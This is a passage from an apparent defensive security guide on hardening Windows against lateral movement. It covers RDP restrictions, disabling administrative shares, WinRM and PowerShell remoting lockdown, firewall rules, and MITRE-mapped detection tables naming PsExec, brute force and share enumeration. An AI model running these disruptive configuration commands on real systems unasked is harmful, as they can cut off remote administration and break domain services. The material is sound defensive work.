<p role="presentation"><span>On the RDP server, users permitted for remote access using RDP must be assigned the </span><span>Access this computer from the network</span><span> privilege when NLA is enforced. </span><strong>This privilege is often explicitly denied for user accounts to protect against lateral movement techniques.</strong></p>
</li>
</ul>
<h5><span>Restrict Administrative Accounts from Leveraging RDP on Internet-Facing Systems</span></h5>
<p><span>For external-facing RDP servers, highly privileged domain and local administrative accounts should not be permitted access to authenticate with the external-facing systems using RDP (Figure 12). </span></p>
<p><span>This can be enforced using Group Policy, configurable via the following path: </span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment &gt; Deny log on through Terminal Services</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig12.max-1000x1000.png" alt="Group Policy configuration for restricting highly privileged domain and local administrative accounts from leveraging RDP">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ro2xo">Figure 12: Group Policy configuration for restricting highly privileged domain and local administrative accounts from leveraging RDP</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for RDP Usage</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>RDP Authentication Integration </span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1110/" rel="noopener" target="_blank"><span>T1110 – Brute Force</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1021/001/" rel="noopener" target="_blank"><span>T1021.001 – Remote Desktop Protocol</span></a></p>
</td>
<td>
<p><span>Existing authentication rules should include RDP attempts. This includes use cases for:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Brute Force</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Password Spraying</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MFA Failures Single User</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MFA Failures Single Source</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>External Authentication from an Account with Elevated Privileges</span></p>
</li>
</ul>
</td>
</tr>
<tr>
<td>
<p><span>Anomalous Connection Attempts over RDP</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1021/001/" rel="noopener" target="_blank"><span>T1021.001 – Remote Desktop Protocol</span></a></p>
</td>
<td>
<p><span>Searching for anomalous RDP connection attempts over known RDP ports such as TCP/3389.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 14: Detection Opportunities for RDP Usage</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Disabling Administrative/Hidden Shares</span></h4>
<p><span>To conduct lateral movement, threat actors may attempt to identify administrative or hidden network shares, including those that are not explicitly mapped to a drive letter and use these for remotely binding to endpoints throughout an environment. As a protective or rapid containment measure, organizations may need to quickly disable default administrative or hidden shares from being accessible on endpoints. This can be accomplished by either modifying the registry, stopping a service, or by using the <a href="https://www.microsoft.com/en-us/download/details.aspx?id=55319" rel="noopener" target="_blank">MSS (Legacy) Group Policy template</a></span><span>.</span></p>
<p><span>Common administrative and hidden shares on endpoints include:</span></p>
<ul>
<li role="presentation"><code>ADMIN$</code></li>
<li role="presentation"><code>C$</code></li>
<li role="presentation"><code>D$</code></li>
<li role="presentation"><code>IPC$</code></li>
</ul></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><strong>Note:</strong><span> </span><span>Disabling administrative and hidden shares on servers, specifically including domain controllers, may significantly impact the operation and functionality of systems within a domain-based environment.</span></p>
<span>Additionally, if PsExec is used in an environment, disabling the admin (</span><code>ADMIN$</code><span>) share can restrict the capability for this tool to be used to remotely interface with endpoints.</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h5><span>Registry Method</span></h5>
<p><span>Using the registry, administrative and hidden shares can be disabled on endpoints (Figure 13 and Figure 14).</span></p>
<h6><span>Workstations</span></h6></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
DWORD Name = "AutoShareWks"
Value = "0"</code></pre>
<p><span>Figure 13: Registry value disabling administrative shares on workstations</span></p></div>
<div class="block-paragraph_advanced"><h6><span>Servers</span></h6></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
DWORD Name = "AutoShareServer"
Value = "0"</code></pre>
<p><span>Figure 14: Registry value disabling administrative shares on servers</span></p></div>
<div class="block-paragraph_advanced"><h5><span>Service Method</span></h5>
<p><span>By stopping the </span><span>Server</span><span> service on an endpoint, the ability to access any shares hosted on the endpoint will be disabled (Figure 15).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig15.max-1000x1000.png" alt="Server service properties">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="7xllt">Figure 15: Server service properties</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h5><span>Group Policy Method</span></h5>
<p><span>Using the MSS (Legacy) Group Policy template, administrative and hidden shares can be disabled on either a server or workstation via a GPO setting (Figure 16).</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MSS (Legacy) &gt; MSS (AutoShareServer)</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Disabled</span></p>
</li>
</ul>
</li>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MSS (Legacy) &gt; MSS (AutoShareWks)</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Disabled</span></p>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig16.max-1000x1000.png" alt="Disabling Administrative And Hidden Shares via the MSS (Legacy) Group Policy Template">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="7xllt">Figure 16: Disabling administrative and hidden shares via the MSS (Legacy) Group Policy template</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for Accessing Administrative or Hidden Shares</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Network Discovery: Suspicious Usage of the Net Command</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1049/" rel="noopener" target="_blank"><span>T1049 - System Network Connections Discovery</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1135/" rel="noopener" target="_blank"><span>T1135 - Network Share Discovery</span></a></p>
</td>
<td>
<p><span>Search for suspicious use of the </span><code>net</code><span> command to enumerate systems and file shares within an environment.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 15: Detection opportunities for accessing administrative or hidden shares</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Hardening Windows Remote Management</span></h4>
<p><span>Threat actors may leverage Windows Remote Management (WinRM) to laterally move throughout an environment. </span><strong>WinRM is enabled by default on all Windows Server operating systems (since Windows Server 2012 and above)</strong><span>, but disabled on all client operating systems (Windows 7 and Windows 10) and older server platforms (Windows Server 2008 R2).</span></p>
<p><span>PowerShell remoting (PS remoting) is a native Windows remote command execution feature that is built on top of the WinRM protocol.</span></p>
<p><span>Windows client (nonserver) operating system platforms where WinRM is disabled indicates that there is:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>No WinRM listener configured</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>No Windows firewall exception configured</span></p>
</li>
</ul>
<p><span>By default, WinRM uses TCP/5985 and TCP/5986, which can be either disabled using the Windows Firewall or configured so that a specific subset of IP addresses can be authorized for connecting to endpoints using WinRM.</span></p>
<p><span>WinRM and PowerShell remoting can be explicitly disabled on endpoint using either a PowerShell command (Figure 17) or specific GPO settings.</span></p>
<h5><span>PowerShell</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Disable-PSRemoting -Force</code></pre>
<p><span>Figure 17: PowerShell command to disable WinRM/PowerShell remoting on an endpoint</span></p></div>
<div class="block-paragraph_advanced"><p><strong>Note:</strong><span> </span><span>Running </span><code>Disable-PSRemoting -Force</code><span> does not prevent local users from creating PowerShell sessions on the local computer or for sessions destined for remote computers.</span></p>
<p><span>After running the command, the message recorded in Figure 18 will be displayed. These steps provide additional hardening, but after running the </span><code>Disable-PSRemoting -Force</code><span> command, PowerShell sessions destined for the target endpoint will not be successful.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig18.max-1000x1000.png" alt="Warning message after disabling PSRemoting">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="gwqyc">Figure 18: Warning message after disabling PSRemoting</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>To enforce the additional steps for disabling WinRM via PowerShell (Figure 19 through Figure 22):</span></p>
<ol>
<li><span>Stop and disable the </span><span>WinRM</span><span> service.<br><br></span>
<pre class="language-plain"><code>Stop-Service WinRM -PassThruSet-Service WinRM -StartupType Disabled</code></pre>
<p><span>Figure 19: PowerShell command to stop and disable the WinRM service</span></p>
<span><br></span></li>
<li><span><span>Disable the listener that accepts requests on any IP address.<br><br></span></span>
<pre class="language-plain"><code>dir wsman:\localhost\listener

Remove-Item -Path WSMan:\Localhost\listener\&lt;Listener name&gt;</code></pre>
<p><span>Figure 20: PowerShell commands to delete a WSMan listener</span></p>
<span><span><br></span></span></li>
<li><span><span>Disable the firewall exceptions for WS-Management communications.<br><br></span></span>
<pre class="language-plain"><code>Set-NetFirewallRule -DisplayName 'Windows Remote Management (HTTP-In)' -Enabled False </code></pre>
<p><span>Figure 21: PowerShell command to disable firewall exceptions for WinRM</span></p>
<span><span><br></span></span></li>
<li><span><span><span>Restore the value of </span><code>the LocalAccountTokenFilterPolicy</code><span> to 0, which restricts remote access to members of the Administrators group on the computer.<br><br></span></span></span>
<pre class="language-plain"><code>Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system -Name LocalAccountTokenFilterPolicy -Value 0</code></pre>
<p><span><span><span><span>Figure 22: PowerShell command to configure the registry key for LocalAccountTokenFilterPolicy</span></span></span></span></p>
</li>
</ol></div>
<div class="block-paragraph_advanced"><h5><span>Group Policy</span></h5>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; Windows Components &gt; Windows Remote Management (WinRM) &gt; WinRM Service &gt; Allow remote server management through WinRM</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Disabled</span></p>
</li>
</ul>
</li>
</ul>
<p><span>If this setting is configured as </span><span>Disabled</span><span>, the WinRM service will not respond to requests from a remote computer, regardless of whether any WinRM listeners are configured.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; Windows Components &gt; Windows Remote Shell &gt; Allow Remote Shell Access </span></p>
<ul>
<li aria-level="1"><span><span>Disabled</span></span></li>
</ul>
</li>
</ul>
<p><span>This policy setting will manage the configuration of remote access to all supported shells to execute scripts and commands.</span></p>
<h4><span>Detection Opportunities for WinRM Usage</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Unauthorized WinRM Execution Attempt</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/006/" rel="noopener" target="_blank"><span>T1021.006 - Remote Services: Windows Remote Management</span></a></p>
</td>
<td>
<p><span>Search for command execution attempts for WinRM on a system where WinRM has been disabled.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Suspicious Process Creation Using WinRM</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/006/" rel="noopener" target="_blank"><span>T1021.006 - Remote Services: Windows Remote Management</span></a></p>
</td>
<td>
<p><span>Search for anomalous process creation events using WinRM that deviate from an established baseline.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Suspicious Network Connection Using WinRM</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/006/" rel="noopener" target="_blank"><span>T1021.006 - Remote Services: Windows Remote Management</span></a></p>
</td>
<td>
<p><span>Search for network activity over known WinRM ports, such as TCP/5985 and TCP/5986, to identify anomalous connections that deviate from an established baseline.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Remote WMI Connection Using WinRM</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/006/" rel="noopener" target="_blank"><span>T1021.006 - Remote Services: Windows Remote Management</span></a></p>
</td>
<td>
<p><span>Search for remote WMI connection attempts using WinRM. </span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 16: Detection opportunities for WinRM use</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Restricting Common Lateral Movement Tools and Methods</span></h4>
<p><span>Table 17 provides a consolidated summary of security configurations that can be leveraged to combat against common remote access tools and methods used for lateral movement within environments.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><span>Tool/Tactic</span></p>
</th>
<th scope="col">
<p><span>Mitigating Security Configurations (Target Endpoints)</span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><span>PsExec (using the current logged-on user account, without the </span><code>-u</code><span> switch)</span></p>
<p><span>If the </span><code>-u</code><span> switch is not leveraged, authentication will use Kerberos or NTLM for the current logged-on user of the source endpoint and will register as a Type 3 (network) logon on the destination endpoint.</span></p>
<p><span>PsExec high-level functionality:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Connects to the hidden </span><code>ADMIN$</code><span> share (mapping to the </span><code>C:\Windows</code><span> folder) on a remote endpoint via SMB (TCP/445).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Uses the Service Control Manager (SCM) to start the </span><code>PSExecsvc</code><span> service and enable a named pipe on a remote endpoint.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Input/output redirection for the console is achieved via the created named pipe.</span></p>
</li>
</ul>
</td>
<td>
<p><strong>Option 1:</strong></p>
<p><span>GPO configuration:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny access to this computer from the network</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny access to this computer from the network</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny log on locally</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny log on through Terminal Services</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DCOM:Machine Launch Restrictions in Security Descriptor Definition Language (SDDL) Syntax</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Local Policies &gt; Security Options</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DCOM:Machine Access Restrictions in Security Descriptor Definition Language (SDDL) Syntax</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deny access to this computer from the network</span></p>
</li>
</ul>
<p><strong>Option 2: </strong></p>
<p><span>Windows Firewall rule:<br><br></span></p>
<pre class="language-plain"><code>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no</code></pre>
<p><span>Figure 23: PowerShell command to disable inbound file and print sharing (SMB) for an endpoint using a local Windows Firewall rule</span></p>
<p><strong>Option 3:</strong></p>
<p><span>Disable administrative and hidden shares.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>PsExec (with Alternative Credentials, via the </span><code>-u</code><span> switch)</span></p>
<p><span>If the </span><code>-u</code><span> switch is leveraged, authentication will use the alternate supplied credentials and will register as a Type 3 (network) and Type 2 (interactive) logon on the destination endpoint.</span></p>
</td>
<td>
<p><strong>Option 1:</strong></p>
<p><span>GPO configuration:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p>
</li>
</ul>
<p><strong>Option 2:</strong></p>
<p><span>Windows Firewall rule:<br><br></span></p>
<pre class="language-plain"><code>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no</code></pre>
<p><span>Figure 24: PowerShell command to disable inbound file and print sharing (SMB) for an endpoint using a local Windows Firewall rule</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Remote Desktop Protocol (RDP)</span></p>
</td>
<td>
<p><strong>Option 1:</strong></p>
<p><span>GPO configuration:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p>
</li>
</ul>
<p><strong>Option 2:</strong></p>
<p><span>Windows Firewall rule:<br><br></span></p>
<pre class="language-plain"><code>netsh advfirewall firewall set rule group="Remote Desktop" new enable=no</code></pre>
<p><span>Figure 25: PowerShell command to disable inbound Remote Desktop (RDP) for an endpoint using a local Windows Firewall rule</span></p>
</td>
</tr>
<tr>
<td>
<p><span>PS remoting and WinRM</span></p>
</td>
<td>
<p><strong>Option 1:</strong></p>
<p><span>PowerShell command:<br><br></span></p>
<pre class="language-plain"><code>Disable-PSRemoting -Force</code></pre>
<p><span>Figure 26: PowerShell command to disable PowerShell remoting for an endpoint</span></p>
<p><strong>Option 2:</strong></p>
<p><span>GPO configuration:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; Windows Components &gt; Windows Remote Management (WinRM) &gt; WinRM Service &gt; Allow remote server management through WinRM</span></p>
</li>
</ul>
<p><strong>Option 3:</strong></p>
<p><span>Windows Firewall rule:<br><br></span></p>
<pre class="language-plain"><code>netsh advfirewall firewall set rule group="Windows Remote Management" new enable=no</code></pre>
<p><span>Figure 27: PowerShell command to disable inbound WinRM for an endpoint using a local Windows Firewall rule</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Distributed Component Object Model (DCOM)</span></p>
</td>
<td>
<p><strong>Option 1:</strong></p>
<p><span>GPO configuration:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Local Policies &gt; Security Options</span></p>
</li>
</ul>
<p><span>Both of these settings allow an organization to define additional computer-wide controls that govern access to all DCOM–based applications on an endpoint.</span></p>
<p><span>When users or groups that are provided permissions are specified, the security descriptor field is populated with the SDDL representation of those groups and privileges.</span></p>
<p><span>Users and groups can be given explicit </span><span>Allow</span><span> or </span><span>Deny</span><span> privileges for both local and remote access using DCOM.</span></p>
<p><strong>Option 2:</strong></p>
<p><span>Windows Firewall rules:<br><br></span></p>
<pre class="language-plain"><code>netsh advfirewall firewall set rule group="COM+ Network Access" new enable=no

netsh advfirewall firewall set rule group="COM+ Remote Administration" new enable=no</code></pre>
<p><span>Figure 28: PowerShell commands to disable inbound DCOM for an endpoint using a local Windows Firewall rule</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Third-party remote access applications (e.g., VNC/DameWare/ScreenConnect) that rely upon specific interactive and remote logon permissions being configured on an endpoint.</span></p>
</td>
<td>
<p><span>GPO configuration:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p>
</li>
</ul>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table 17: Common lateral movement tools/methods and mitigating security controls</span></div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for Common Lateral Movement Tools and Methods</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Anomalous PsExec Usage</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1569/002/" rel="noopener" target="_blank"><span>T1569.002 – System Services: Service Execution</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1021/002/" rel="noopener" target="_blank"><span>T1021.002 – Remote Services: SMB/Windows Admin Shares</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1570/" rel="noopener" target="_blank"><span>T1570 – Lateral Tool Transfer</span></a></p>
</td>
<td>
<p><span>Search for attempted execution of PsExec on systems where PsExec is disabled or where it deviates from normal activity.</span></p>
</td>
</tr>
<tr>
<td>
